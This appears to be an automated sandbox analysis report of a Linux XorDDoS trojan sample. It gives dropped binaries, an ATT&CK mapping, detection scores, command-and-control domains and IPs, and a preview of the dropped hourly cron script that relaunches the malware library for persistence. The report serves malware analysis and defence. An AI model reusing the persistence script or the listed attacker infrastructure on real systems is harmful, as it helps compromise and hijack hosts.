                        Source: Yara matchFile source: /usr/bin/vxnottgwjc, type: DROPPED
                        Source: Yara matchFile source: /usr/bin/akxqlcphlm, type: DROPPED
                        Source: Yara matchFile source: /usr/bin/uprkxpaulc, type: DROPPED
                        Source: Yara matchFile source: /usr/bin/hhmykaposi, type: DROPPED
                        Source: Yara matchFile source: /usr/bin/lzqmjtjpqw, type: DROPPED
                        Source: Yara matchFile source: /usr/bin/xnntpqonav, type: DROPPED
                        Source: Yara matchFile source: /usr/bin/bingytdcwk, type: DROPPED
                        Source: Yara matchFile source: /usr/bin/wqgmxyrptd, type: DROPPED
                        Source: Yara matchFile source: /usr/bin/kexmeeeolw, type: DROPPED
                        Source: Yara matchFile source: /usr/bin/mligukcpvp, type: DROPPED
                        Source: Yara matchFile source: /usr/bin/ybfpvjxtlx, type: DROPPED

                        Mitre Att&ck Matrix

                        Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                        Valid AccountsScripting2Systemd Service1Systemd Service1Masquerading11OS Credential Dumping1Security Software Discovery11Remote ServicesData from Local SystemExfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                        Default AccountsAt (Linux)2At (Linux)2At (Linux)2Scripting2LSASS MemorySystem Information Discovery2Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothNon-Standard Port1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                        Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)File Deletion1Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationIngress Tool Transfer1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                        Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Binary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureScheduled TransferNon-Application Layer Protocol2SIM Card SwapCarrier Billing Fraud
                        Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA SecretsRemote System DiscoverySSHKeyloggingData Transfer Size LimitsApplication Layer Protocol3Manipulate Device CommunicationManipulate App Store Rankings or Ratings

                        Malware Configuration

                        No configs have been found

                        Behavior Graph

                        Hide Legend

                        Legend:

                        • Process
                        • Signature
                        • Created File
                        • DNS/IP Info
                        • Is Dropped
                        • Number of created Files
                        • Is malicious
                        • Internet
                        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 548446 Sample: XZFWLZVF1Z Startdate: 05/01/2022 Architecture: LINUX Score: 100 72 ppp.gggatat456.com 54.36.15.99, 1522, 40608 OVHFR France 2->72 74 aa.hostasa.org 99.83.154.118, 39336, 80 AMAZON-02US United States 2->74 76 3 other IPs or domains 2->76 78 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->78 80 Antivirus detection for dropped file 2->80 82 Antivirus / Scanner detection for submitted sample 2->82 84 4 other signatures 2->84 10 XZFWLZVF1Z 2->10         started        12 systemd snapd-env-generator 2->12         started        signatures3 process4 process5 14 XZFWLZVF1Z 10->14         started        file6 64 /usr/lib/libudev.so, ELF 14->64 dropped 66 /usr/bin/zhoomtcmjp, ELF 14->66 dropped 68 /usr/bin/ybfpvjxtlx, ELF 14->68 dropped 70 15 other malicious files 14->70 dropped 92 Drops files in suspicious directories 14->92 94 Sample deletes itself 14->94 96 Sample tries to persist itself using cron 14->96 98 Sample tries to persist itself using System V runlevels 14->98 18 XZFWLZVF1Z sh 14->18         started        22 XZFWLZVF1Z 14->22         started        24 XZFWLZVF1Z 14->24         started        26 100 other processes 14->26 signatures7 process8 file9 62 /etc/crontab, ASCII 18->62 dropped 86 Sample tries to persist itself using cron 18->86 28 sh sed 18->28         started        31 XZFWLZVF1Z vxnottgwjc 22->31         started        33 XZFWLZVF1Z vxnottgwjc 24->33         started        35 XZFWLZVF1Z vxnottgwjc 26->35         started        37 XZFWLZVF1Z vxnottgwjc 26->37         started        39 XZFWLZVF1Z vxnottgwjc 26->39         started        41 97 other processes 26->41 signatures10 process11 signatures12 90 Sample tries to persist itself using cron 28->90 43 vxnottgwjc 31->43         started        46 vxnottgwjc 33->46         started        48 vxnottgwjc 35->48         started        50 vxnottgwjc 37->50         started        52 vxnottgwjc 39->52         started        54 wqgmxyrptd 41->54         started        56 wqgmxyrptd 41->56         started        58 wqgmxyrptd 41->58         started        60 87 other processes 41->60 process13 signatures14 88 Sample deletes itself 43->88

                        Antivirus, Machine Learning and Genetic Malware Detection

                        Initial Sample

                        SourceDetectionScannerLabelLink
                        XZFWLZVF1Z65%VirustotalBrowse
                        XZFWLZVF1Z35%MetadefenderBrowse
                        XZFWLZVF1Z74%ReversingLabsLinux.Network.XorDDoS
                        XZFWLZVF1Z100%AviraLINUX/Xorddos.ucgtz
                        XZFWLZVF1Z100%Joe Sandbox ML

                        Dropped Files

                        SourceDetectionScannerLabelLink
                        /usr/lib/libudev.so100%AviraLINUX/Xorddos.ucgtz
                        /usr/bin/prxseumwxz100%Joe Sandbox ML
                        /usr/bin/vxnottgwjc100%Joe Sandbox ML
                        /usr/bin/lzqmjtjpqw100%Joe Sandbox ML
                        /usr/bin/wqgmxyrptd100%Joe Sandbox ML
                        /usr/bin/akxqlcphlm100%Joe Sandbox ML
                        /usr/lib/libudev.so100%Joe Sandbox ML
                        /usr/bin/xnntpqonav100%Joe Sandbox ML
                        /usr/bin/qkswzskzvm100%Joe Sandbox ML
                        /usr/bin/uprkxpaulc100%Joe Sandbox ML
                        /usr/bin/ppozyahgxh100%Joe Sandbox ML
                        /usr/bin/kexmeeeolw100%Joe Sandbox ML
                        /usr/bin/hhmykaposi100%Joe Sandbox ML
                        /usr/bin/ybfpvjxtlx100%Joe Sandbox ML
                        /usr/bin/zhoomtcmjp100%Joe Sandbox ML
                        /usr/bin/bingytdcwk100%Joe Sandbox ML
                        /usr/bin/mligukcpvp100%Joe Sandbox ML
                        /etc/cron.hourly/gcc.sh0%MetadefenderBrowse
                        /etc/cron.hourly/gcc.sh28%ReversingLabsLinux.Trojan.XorDDoS

                        Domains

                        SourceDetectionScannerLabelLink
                        ppp.gggatat456.com6%VirustotalBrowse
                        aa.hostasa.org5%VirustotalBrowse

                        URLs

                        SourceDetectionScannerLabelLink
                        http://aa.hostasa.org/config.rar8%VirustotalBrowse
                        http://aa.hostasa.org/config.rar0%Avira URL Cloudsafe
                        http://aa.hostasa.org/config.rartat456.com:15220%Avira URL Cloudsafe

                        Domains and IPs

                        Contacted Domains

                        NameIPActiveMaliciousAntivirus DetectionReputation
                        ppp.gggatat456.com
                        54.36.15.99
                        truetrueunknown
                        aa.hostasa.org
                        99.83.154.118
                        truetrueunknown

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        http://aa.hostasa.org/config.rartrue
                        • 8%, Virustotal, Browse
                        • Avira URL Cloud: safe
                        unknown

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
                        http://www.gnu.org/software/libc/bugs.htmlXZFWLZVF1Z, vxnottgwjc.11.dr, lzqmjtjpqw.11.dr, wqgmxyrptd.11.dr, akxqlcphlm.11.dr, libudev.so.11.dr, xnntpqonav.11.dr, qkswzskzvm.11.dr, uprkxpaulc.11.dr, ppozyahgxh.11.dr, kexmeeeolw.11.dr, hhmykaposi.11.dr, ybfpvjxtlx.11.dr, zhoomtcmjp.11.dr, bingytdcwk.11.dr, mligukcpvp.11.drfalse
                          high
                          http://aa.hostasa.org/config.rartat456.com:1522XZFWLZVF1Z, 5217.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5219.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5220.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5221.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5236.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5239.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5241.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5244.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5247.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5253.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5255.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5258.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5261.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5264.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5273.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5274.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5275.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5276.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5277.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5278.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5279.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5280.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5281.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5286.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5287.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5288.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5290.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5293.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5296.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5302.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5303.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5304.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5306.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5309.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5312.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5318.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5321.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5324.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5326.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5329.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5337.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5340.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5342.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5345.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5348.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5357.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5360.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5362.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5365.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5368.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5374.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5377.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5379.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5382.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5384.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5391.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5394.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5397.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5399.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5402.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5408.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5413.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5416.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5418.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5420.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5427.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5430.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5433.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5435.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5438.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5445.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5448.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5450.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5453.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5456.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5462.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5465.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5467.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5469.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5472.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5479.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5482.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5485.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5487.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5490.1.0000000057949c7e.00000000ef720726.rw-.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown

                          Contacted IPs

                          • No. of IPs < 25%
                          • 25% < No. of IPs < 50%
                          • 50% < No. of IPs < 75%
                          • 75% < No. of IPs

                          Public

                          IPDomainCountryFlagASNASN NameMalicious
                          54.36.15.99
                          ppp.gggatat456.comFrance
                          16276OVHFRtrue
                          99.83.154.118
                          aa.hostasa.orgUnited States
                          16509AMAZON-02UStrue
                          109.202.202.202
                          unknownSwitzerland
                          13030INIT7CHfalse
                          91.189.91.43
                          unknownUnited Kingdom
                          41231CANONICAL-ASGBfalse
                          91.189.91.42
                          unknownUnited Kingdom
                          41231CANONICAL-ASGBfalse


                          Runtime Messages

                          Command:/tmp/XZFWLZVF1Z
                          Exit Code:0
                          Exit Code Info:
                          Killed:False
                          Standard Output:

                          Standard Error:

                          Joe Sandbox View / Context

                          IPs

                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                          99.83.154.118EgrT0zBhDaGet hashmaliciousBrowse
                          • aa.hostasa.org/config.rar
                          Request to send offer . no.ex212304.xlsxGet hashmaliciousBrowse
                          • www.nokujs.com/nv6i/?9r6xXLaP=xFLmV40GuCCc0kdvikLwkJ3Yf766ovr09Y+hGRp+lSKTXz5Br4tKCF/zB2PSNlDdtKztNg==&8pRD=w48DZXeX
                          nYumJ6Ilnz.exeGet hashmaliciousBrowse
                          • www.sedsn.com/fqiq/?c2MDQnE=6ISnWJ5IVIbtNhVzjtfxERrUTLF5vMYTcanI6VglRujslHiyRX6eyOmSCjZyCa0pXfTC&-ZnDH=KBCxfhHpQl0d
                          Proforma Invoice.exeGet hashmaliciousBrowse
                          • www.lmss-iidse.com/ecus/?R0GDM=TEL0N6mC11PeJj13mg6TaFRH2kEmzUtE5z/sPVvb7qQf+jRomBjW5u4WMEL2Ku8fDPOD&SpQLD=5jxdA6Vhdj
                          Purchase Order.exeGet hashmaliciousBrowse
                          • www.lmss-iidse.com/ecus/?q6A=TEL0N6mC11PeJj13mg6TaFRH2kEmzUtE5z/sPVvb7qQf+jRomBjW5u4WMHnmWfgkE6nSjTj5Bg==&-ZWD=3fipz
                          GV20.xlsxGet hashmaliciousBrowse
                          • www.sedsn.com/fqiq/?g2=6ISnWJ5NVPbpNxZ/htfxERrUTLF5vMYTca/YmW8kVOjtl2O0WHrSkKeQBG1kGKwaccOy9A==&cL30r=9rotn4JHoV3ltP8
                          triage_dropped_file.exeGet hashmaliciousBrowse
                          • www.sedsn.com/fqiq/?5jo4Zxb8=6ISnWJ5IVIbtNhVzjtfxERrUTLF5vMYTcanI6VglRujslHiyRX6eyOmSCjZyCa0pXfTC&j0GDQ=-ZVdlnjxh6XhUR
                          SOA.exeGet hashmaliciousBrowse
                          • www.viralmoneychallenge.com/ea0r/?dL3tvv=8pTdZ4B8&Yp=Lepnu14XB/nCEJ/uAHOjNvi0Jn4g9YscZIdCjPN29Tycf5o696kGzFrUqUFrVfY3sF1Y
                          08F9B46A4C74EEA48543FD32F70ED0C4E11D11C3B906F.exeGet hashmaliciousBrowse
                          • gimpeditphotos.com//
                          order-2021-PO.Pdf.exeGet hashmaliciousBrowse
                          • www.serviciowebconfiables.com/vocn/?5jYXyzb=YOCMqFNsxD/Wpe8uhY1FBFeu9tjJ3b3uvTr9UYr3esNy8hV5uadZ/rWjhW+P0XthKWCR&IL08W8=d6AXkVBHUjyXZ
                          3DMJ3cevCo.exeGet hashmaliciousBrowse
                          • www.sedsn.com/fqiq/?Z8whC=6ISnWJ5IVIbtNhVzjtfxERrUTLF5vMYTcanI6VglRujslHiyRX6eyOmSCg5iN7kRJ66F&6l=Wzr8
                          AhsMBcI8HE.exeGet hashmaliciousBrowse
                          • www.sedsn.com/fqiq/?FDK=8pHld4yh&IBZp=6ISnWJ5IVIbtNhVzjtfxERrUTLF5vMYTcanI6VglRujslHiyRX6eyOmSCg5iN7kRJ66F
                          NUo71b3C4p.exeGet hashmaliciousBrowse
                          • www.sedsn.com/fqiq/?08CT3r=6ISnWJ5IVIbtNhVzjtfxERrUTLF5vMYTcanI6VglRujslHiyRX6eyOmSCjZyCa0pXfTC&-Z=_b3HXJeXnfc
                          rundll32.exeGet hashmaliciousBrowse
                          • www.sedsn.com/fqiq/?hR=2dsLLTLhqbjx&G48P-=6ISnWJ5IVIbtNhVzjtfxERrUTLF5vMYTcanI6VglRujslHiyRX6eyOmSCg1bBaIRe8mUkwghhQ==
                          l8w9YB1n38.exeGet hashmaliciousBrowse
                          • www.300coin.club/nff/?s0DlctR=0TP6puIP33QX6jv1otlUjD1UZHCWHPMhLbSueqMAIYgrmD4ozvPY1KvBNatXVmvksXGf&i0DDO=4hMpU
                          PO.docGet hashmaliciousBrowse
                          • www.personowner.guru/if60/?xPDxn6=9rThgvBPeDs8DTH&9rK4ARq=HAVwTDf9hhdM5uVFiR32xlZPJI7px6PgcsWLOsR2qKnXYIicfNgC1ah67lW/5Lf7WlrZFg==
                          TRJViVkvTr.exeGet hashmaliciousBrowse
                          • www.conanagent.icu/o4ms/?4h=/EaQaGwVvChT/5jgC/l3EpZh3p4+7DfsxuKNuHDZWGVTDaPEBz26UFk6bCGrrxnVNkDy&sFQ=r0GHpxJxA00xb2Kp
                          0jctoYLZ7N.exeGet hashmaliciousBrowse
                          • www.2ubplu.com/lgym/?grT=frUZIyglkYz9wwlZcAHGc3RRDFq0QyjPNP3eyJ1VgfFyDroF+nnLyYBJ0woTn7XSuxIt&vPz=1b8lrXMX1
                          transferencia bancaria copiar...exeGet hashmaliciousBrowse
                          • www.topservices1.site/oqxs/?Qzu41Z=72qAaw7oqvalhYI8XL/IneGz1VOAq0SvjTwebqvYW0h9gjHm7e3ok9S9BE2u/1NgFveD8MtzdQ==&iv40=t2MXaVnHNfJH
                          Ota2Wn3EP3.exeGet hashmaliciousBrowse
                          • www.wolford.mobi/nthe/?Z0=nN90bh&qJE=pZ5bto4eRgFQQV2e9pRiVkOPPVLU4hJ6tmd8Oz3tnQ3EaOcyZVi3wrSoaTzxXPvbOYCG

                          Domains

                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                          ppp.gggatat456.com7ZDbt9EUgmGet hashmaliciousBrowse
                          • 51.89.70.85
                          ygljglkjgfg0Get hashmaliciousBrowse
                          • 51.89.52.13
                          2wyzX8yBdRGet hashmaliciousBrowse
                          • 51.38.200.187
                          aa.hostasa.orgEgrT0zBhDaGet hashmaliciousBrowse
                          • 99.83.154.118

                          ASN

                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                          OVHFR51GwtT3DUa.dllGet hashmaliciousBrowse
                          • 5.196.196.253
                          3A6CA6A75525505890DC5D13AB3D888135B1CB4922605.exeGet hashmaliciousBrowse
                          • 188.165.5.107
                          yoi1hLt6Yg.exeGet hashmaliciousBrowse
                          • 54.38.220.85
                          00B5C410D204D6A92F6636E23998777D2716E8928F96B.exeGet hashmaliciousBrowse
                          • 188.165.5.107
                          fiWSY3kPgj.exeGet hashmaliciousBrowse
                          • 54.38.220.85
                          EIYeUMMU25.exeGet hashmaliciousBrowse
                          • 54.38.220.85
                          7zJwsSgHYP.exeGet hashmaliciousBrowse
                          • 51.91.13.105
                          question,12.27.2021.docGet hashmaliciousBrowse
                          • 54.38.220.85
                          S1DD8E0uYz.exeGet hashmaliciousBrowse
                          • 54.38.220.85
                          question,12.27.2021.docGet hashmaliciousBrowse
                          • 54.38.220.85
                          question,12.27.2021.docGet hashmaliciousBrowse
                          • 54.38.220.85
                          ZD61j6wVG0.exeGet hashmaliciousBrowse
                          • 54.38.220.85
                          b8kfqLR6Yy.exeGet hashmaliciousBrowse
                          • 54.38.220.85
                          ZmrIkplkoM.exeGet hashmaliciousBrowse
                          • 54.38.220.85
                          mBtzHyN7TT.exeGet hashmaliciousBrowse
                          • 54.38.220.85
                          UYHSdgPlrz.exeGet hashmaliciousBrowse
                          • 54.38.220.85
                          zIMrfkEec8.exeGet hashmaliciousBrowse
                          • 54.38.220.85
                          H5wKkYHgfH.exeGet hashmaliciousBrowse
                          • 54.38.220.85
                          QAy9Baa1GV.exeGet hashmaliciousBrowse
                          • 54.38.220.85
                          ACAs6Kprey.exeGet hashmaliciousBrowse
                          • 188.165.5.107
                          AMAZON-02US7HySsGK5X6.apkGet hashmaliciousBrowse
                          • 108.156.2.69
                          7HySsGK5X6.apkGet hashmaliciousBrowse
                          • 108.156.2.44
                          X1KoCcPX5O.apkGet hashmaliciousBrowse
                          • 54.184.121.245
                          EgrT0zBhDaGet hashmaliciousBrowse
                          • 99.83.154.118
                          MSIFF39.exeGet hashmaliciousBrowse
                          • 34.251.159.253
                          51GwtT3DUa.dllGet hashmaliciousBrowse
                          • 52.222.173.66
                          BACS betaling from Chr Pedersens Tegnestue.xlsxGet hashmaliciousBrowse
                          • 52.222.174.9
                          BACS betaling from Chr Pedersens Tegnestue.xlsxGet hashmaliciousBrowse
                          • 52.222.174.65
                          Payment Electronic.xlsxGet hashmaliciousBrowse
                          • 52.222.174.68
                          Payment Electronic.xlsxGet hashmaliciousBrowse
                          • 52.84.186.21
                          3A6CA6A75525505890DC5D13AB3D888135B1CB4922605.exeGet hashmaliciousBrowse
                          • 52.219.171.86
                          QZ8tggf8vJGet hashmaliciousBrowse
                          • 18.250.251.69
                          pW4sUdDcgTGet hashmaliciousBrowse
                          • 34.249.145.219
                          962rWmfFqM.exeGet hashmaliciousBrowse
                          • 104.192.141.1
                          00B5C410D204D6A92F6636E23998777D2716E8928F96B.exeGet hashmaliciousBrowse
                          • 52.219.171.142
                          W3gU3DapXuGet hashmaliciousBrowse
                          • 54.171.230.55
                          beamer.x86Get hashmaliciousBrowse
                          • 34.249.145.219
                          P.O 20222021.xlsxGet hashmaliciousBrowse
                          • 52.56.240.171
                          gkNtEEqDQJGet hashmaliciousBrowse
                          • 54.171.230.55
                          vYazbrbPUkGet hashmaliciousBrowse
                          • 34.249.145.219

                          JA3 Fingerprints

                          No context

                          Dropped Files

                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                          /etc/cron.hourly/gcc.shEgrT0zBhDaGet hashmaliciousBrowse
                            4ljhdTTyiAGet hashmaliciousBrowse
                              7nJAEBDitlGet hashmaliciousBrowse
                                ygljglkjgfg0Get hashmaliciousBrowse
                                  bVexvNSHcDGet hashmaliciousBrowse
                                    rJabrNEtBMGet hashmaliciousBrowse
                                      c1152b89-b68a-49af-af67-fd4b61683a72Get hashmaliciousBrowse
                                        w.txtGet hashmaliciousBrowse
                                          w.txtGet hashmaliciousBrowse
                                            1433.binGet hashmaliciousBrowse
                                              isu80Get hashmaliciousBrowse
                                                java8000Get hashmaliciousBrowse
                                                  libudev.soGet hashmaliciousBrowse
                                                    qrfzdxxdxoGet hashmaliciousBrowse
                                                      npobbdmwlyGet hashmaliciousBrowse
                                                        ehttqpxezuGet hashmaliciousBrowse
                                                          libudev.soGet hashmaliciousBrowse
                                                            Trojan.Linux.XorDDoS.2Get hashmaliciousBrowse
                                                              xorddos.soGet hashmaliciousBrowse
                                                                BeEhKJSCAn.virus_totalGet hashmaliciousBrowse

                                                                  Created / dropped Files

                                                                  /etc/cron.hourly/gcc.sh
                                                                  Process:/tmp/XZFWLZVF1Z
                                                                  File Type:POSIX shell script, ASCII text executable
                                                                  Category:dropped
                                                                  Size (bytes):228
                                                                  Entropy (8bit):4.807897441464882
                                                                  Encrypted:false
                                                                  SSDEEP:3:TKH4v1kxtsLNELQ9YmPQnMLnVMPQmlZnEMFaGZg28Xwf6SkCVcLNGLC75pkVKJdm:htiy4Mrm9lVNy28XbCVP270gJdE/v
                                                                  MD5:3BAB747CEDC5F0EBE86AAA7F982470CD
                                                                  SHA1:3C7D1C6931C2B3DAE39D38346B780EA57C8E6142
                                                                  SHA-256:74D31CAC40D98EE64DF2A0C29CEB229D12AC5FA699C2EE512FC69360F0CF68C5
                                                                  SHA-512:21E8A6D9CA8531D37DEF83D8903E5B0FA11ECF33D85D05EDAB1E0FEB4ACAC65AE2CF5222650FB9F533F459CCC51BB2903276FF6F827B847CC5E6DAC7D45A0A42
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: Metadefender, Detection: 0%, Browse
                                                                  • Antivirus: ReversingLabs, Detection: 28%
                                                                  Joe Sandbox View:
                                                                  • Filename: EgrT0zBhDa, Detection: malicious, Browse
                                                                  • Filename: 4ljhdTTyiA, Detection: malicious, Browse
                                                                  • Filename: 7nJAEBDitl, Detection: malicious, Browse
                                                                  • Filename: ygljglkjgfg0, Detection: malicious, Browse
                                                                  • Filename: bVexvNSHcD, Detection: malicious, Browse
                                                                  • Filename: rJabrNEtBM, Detection: malicious, Browse
                                                                  • Filename: c1152b89-b68a-49af-af67-fd4b61683a72, Detection: malicious, Browse
                                                                  • Filename: w.txt, Detection: malicious, Browse
                                                                  • Filename: w.txt, Detection: malicious, Browse
                                                                  • Filename: 1433.bin, Detection: malicious, Browse
                                                                  • Filename: isu80, Detection: malicious, Browse
                                                                  • Filename: java8000, Detection: malicious, Browse
                                                                  • Filename: libudev.so, Detection: malicious, Browse
                                                                  • Filename: qrfzdxxdxo, Detection: malicious, Browse
                                                                  • Filename: npobbdmwly, Detection: malicious, Browse
                                                                  • Filename: ehttqpxezu, Detection: malicious, Browse
                                                                  • Filename: libudev.so, Detection: malicious, Browse
                                                                  • Filename: Trojan.Linux.XorDDoS.2, Detection: malicious, Browse
                                                                  • Filename: xorddos.so, Detection: malicious, Browse
                                                                  • Filename: BeEhKJSCAn.virus_total, Detection: malicious, Browse
                                                                  Reputation:moderate, very likely benign file
                                                                  Preview: #!/bin/sh.PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin:/usr/X11R6/bin.for i in `cat /proc/net/dev|grep :|awk -F: {'print $1'}`; do ifconfig $i up& done.cp /lib/libudev.so /lib/libudev.so.6./lib/libudev.so.6.
                                                                  /etc/crontab
                                                                  Process:/bin/sh
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):41
                                                                  Entropy (8bit):3.8484226636198593
                                                                  Encrypted:false
                                                                  SSDEEP:3:FFP13tKebPv4KFcKv:/P1IebPPFcKv
                                                                  MD5:636299E19F3BFB8CDA661BC956C1CE7F
                                                                  SHA1:2B45273CCBFE139D58FC3554D6943D4338C18E15
                                                                  SHA-256:8CBDE8A027F2887DD7A3C5C6F98FDF127BAE31FE457FEF9D7945C9E48D195F44
                                                                  SHA-512:41AF1A49B86C9C81965AF32B404494CC5072AFDA004F385977110F8EA134A770650CBD2F9617AFCD87D6744954659BE4AE365E65DCA4491A375275E710310F1A
                                                                  Malicious:true
                                                                  Reputation:moderate, very likely benign file
